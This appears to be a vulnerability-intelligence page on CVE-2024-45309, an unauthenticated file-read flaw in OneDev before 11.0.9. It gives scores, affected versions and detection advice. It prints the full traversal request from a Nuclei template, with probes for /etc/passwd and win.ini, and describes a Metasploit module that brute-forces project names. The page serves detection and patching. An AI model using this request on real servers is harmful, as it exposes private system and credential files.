CVE-2024-45309
published 2024-10-21CVE-2024-45309: OneDev is a Git server with CI/CD, kanban, and packages. A vulnerability in versions prior to 11.0.9 allows unauthenticated users to read arbitrary files…
PriorityP182high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
24.82%
97.6th percentile
OneDev is a Git server with CI/CD, kanban, and packages. A vulnerability in versions prior to 11.0.9 allows unauthenticated users to read arbitrary files accessible by the OneDev server process. This issue has been fixed in version 11.0.9.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| onedev_project | onedev | < 11.0.9 | 11.0.9 |
| theonedev | onedev | < 11.0.9 | 11.0.9 |
Detection & IOCsextracted from sources · hover to see the quote
urlGET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
path/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
sigma
HTTP GET request path contains '/~site/' followed by multiple '%2e%2e' path traversal sequences
- →Detect path traversal attempts targeting the OneDev `/~site/` endpoint with URL-encoded dot-dot sequences (`%2e%2e`) in HTTP GET requests — no authentication required for exploitation.
- →Successful exploitation returns HTTP 200 with `Content-Disposition: filename=` and `Content-Type: application/octet-stream` headers — alert on these response headers combined with a traversal path in the request.
- →A valid OneDev project name is required to exploit the vulnerability; attackers may brute-force project names using a wordlist if anonymous access is disabled. ↗
- →If anonymous access is enabled, any unauthenticated visitor can enumerate existing project names, lowering the bar for exploitation — monitor for unauthenticated project listing requests. ↗
- →Probe payloads target `/etc/passwd` (Linux) and `/windows/win.ini` (Windows) — alert on these file paths appearing in HTTP request URIs against OneDev instances.
- ·The vulnerability affects OneDev versions prior to 11.0.9 (i.e., <= 11.0.8); version 11.0.9 contains the fix — ensure detections are scoped to unpatched instances. ↗
- ·The traversal payload uses multiple leading slashes (`////////`) before the `%2e%2e` sequences — detection rules must account for this slash-padding bypass technique and not rely solely on a single `../` pattern.
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.7HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
OneDev.io < 11.0.9 - Arbitrary File Read
nuclei·CVSS 8.7
CVE-2024-45309 [HIGH] OneDev.io < 11.0.9 - Arbitrary File Read
OneDev.io '
internal: true
- raw:
- |
GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- 'root:.*:0:0:'
- '\\[(font|extension|file)s\\]'
condition: or
- type: word
part: header
words:
- 'filename='
- 'application/octet-stream'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100a1be84d7e6e775167cdf43ae15612c4129f9f0726563abdcfe963ba68eef6e23022100eadc0809b86c51f4ebf744d6d510dff70492abf7d979d42bbe33b15c541231b6:922c64590222798bb761d5b6d8e72950
Metasploit
OneDev Unauthenticated Arbitrary File Read
metasploit·CVSS 8.7
CVE-2024-45309 [HIGH] OneDev Unauthenticated Arbitrary File Read
OneDev Unauthenticated Arbitrary File Read
This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8. To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor can view existing projects without authentication. However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach. By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
No writeups or analysis indexed.
2024-10-21
Published
Exploited in the wild